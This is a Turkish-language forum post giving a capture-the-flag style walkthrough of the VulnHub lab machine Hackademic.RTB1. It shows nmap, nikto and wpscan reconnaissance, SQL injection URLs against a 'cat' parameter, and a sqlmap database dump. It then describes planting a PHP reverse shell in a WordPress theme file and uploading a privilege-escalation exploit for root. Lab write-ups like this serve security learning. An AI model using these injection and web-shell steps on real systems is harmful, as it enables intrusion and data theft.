Hackademic.RTB1 Çözümü

NAK0

Üye
26 Ara 2015
51
0
https://www.vulnhub.com/entry/hackademic-rtb1,17/

Bu uygulamada sql injection ve web shell örnekleri incelenmiştir. Wordpress üzerinde tarama yapılarak ilerlendikten sonra sql injection ile yetkili wordpress kullanıcısının bilgileri veri tabanından çekilerek login işleminden sonra nasıl web shell alınacağının uygulaması yapılmıştır. Son adımda root hakları elde edilmiştir.

İlk adımda IP adresi tespiti yapılarak port tarama işlemi gerçekleştirilmiştir.

KPCVHa.png


Kod:
nmap -A -T5 -n 10.0.2.4

cz42Sz.png


Çıktıdan da görülüceği üzere hedef işletim sistemi üzerinde SSH ve HTTP portları açıktır.
Nikto ile hızlı bir tarama aşağıdaki gibi yapılmıştır.
Kod:
nikto -h http://10.0.2.4

bdWbRx.png


Nikto ile çok kayda değer bilgiler elde edilememiştir.
Web sitesi görüntülenerek girdi noktalarına bakılmıştır.Sayfanın kaynağı incelendiğinde hedefte wordpress kullanıldığı görülmüştür.

R6PJQy.png


Wpscan aracı ile yapılan tarama sonucunda aşağıdaki açıklıklar tespit edilmiştir.

Kod:
wpscan --url http://10.0.2.4/Hackademic_RTB1/ --enumerate u

TJBVf9.png


c1y5BO.png


Aynı zamanda dizin keşfi yapılarak login sayfası belirlenmiştir.

BexISV.png


eUb3ze.png


Yukarıdaki analizden de görüleceği üzere hedef üzerinde potansiyel sql injection açıklığı vardır.

Siteyi biraz daha dolaşarak hedefe gönderilen postların olduğu sayfa görüntülendiğinde, GET parametresi ile girdi alan cat parametresi bulunmuştur.

VPyTM0.png


Girdi noktasına uygulanan " ' " ile sql injection açıklık kontrolü yapılmıştır.Aşağıda da görüleceği üzere sayfa sql injection açıklığı barındırmaktadır.

fzN845.png


Bu noktadan sonra manuel olarak aşağıdaki sorgularla sql injection yapılmıştır.

Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1

Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1'

Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 1

Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 2

Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 3

Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 4

Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 5

Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 6

Aynı işlem sqlmap aracıyla otomatik olarak aşağıdaki gibi yapılmıştır.

dB2cHV.png


İstek kaydedilerek sqlmap aracına verilmiştir.

sqlmap -r/root/Desktop/injection.pcapng -p cat --dbms mysql --current-db

3IcMP1.png


Aşağıdaki parametreler kullanılarak wp_user adlı tablo verileri çekilerek şifre özetleri kırılmıştır.

JBBVN5.png


Veri tabanından elde edilen bilgiler ile GeorgeMiiler kullanıcısı ve q1w2e3 şifresi ile panalden giriş yapılmıştır.Giriş yapıldıktan sonra Presentation, theme editor sekmelerinden 404.php sayfası web shell kodlarıyla değiştirilmiştir.

6QeNTR.png


php-reversehell.php içerisindeki kodlar 404.php ile değiştirilir.

a2UfVA.png


Sayfa görüntülendiğinde nc ile açılan handler noktasından shell bağlantısı alınmıştır.

Kod:
http://10.0.2.4/Hackademic_RTB1/wp-content/themes/starburst/404.php

SaBIH0.png


Lokalde yetki yükseltmek için uygun exploit araması yapıldığında rds exploitunun bu sistem için uygun olduğu görülmüştür.

IbLKVf.png


Uygun exploit indirilerek hedefe HTTP ile transfer edilmiştir.

9zRbPH.png


19d67N.png


Linux kutuda yetki yükseltilerek root hakları elde edilmiş shell bağlantısı alınmıştır.
 
Moderatör tarafında düzenlendi:

Rapture

Kıdemli Üye
16 Eyl 2018
3,578
4
1,405
Black Sheep
Bunu görünce bir arkadaşla 2 saat boyunca çözmeye çalıştığımız makinalar geldi aklıma, bir türlü beceremedik :D elinize sağlık.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.